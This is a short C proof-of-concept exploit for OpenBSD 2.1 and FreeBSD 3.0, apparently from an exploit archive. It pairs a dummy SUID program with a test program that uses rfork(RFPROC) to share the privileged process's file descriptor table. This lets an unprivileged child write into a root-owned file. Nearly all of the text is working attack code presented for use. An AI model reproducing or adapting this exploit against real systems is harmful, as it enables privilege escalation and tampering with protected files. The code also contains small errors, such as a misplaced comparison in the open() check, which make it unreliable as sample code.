/*    OpenBSD 2.1, FreeBSD 3.0 */

#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

int main()
{
  int fd;

  umask(2);

  /* open a file in the root directory */

  if(fd = open("/VULNERABLE", O_RDWR|O_CREAT) < 0)
    {
      perror("open");
      exit(0);
    }

  /* wait for something to happen */

  for(;;);

  exit(0);
}

-- cut here (test.c) --

#include <stdio.h>
#include <unistd.h>

int main()
{
  int p;

  /* UNPRIVILEGED */

  /* create a new process that shares it's parent's file
   * descriptor table
   */

  if(!(p = rfork(RFPROC)))
    {

      /* wait for parent to open a file, write
       * to it.
 [2000]*/

      sleep(1);
      write(3, "VULNERABLE\n", 10);
      exit(0);
    }

  /* PRIVILEGED */

  /* execute 'p', an SUID program that opens a file and
   * hangs
   */

  execl("./dummy-suid", "dummy-suid", NULL);

  exit(0);
}

/*                    www.hack.co.za              [2000]*/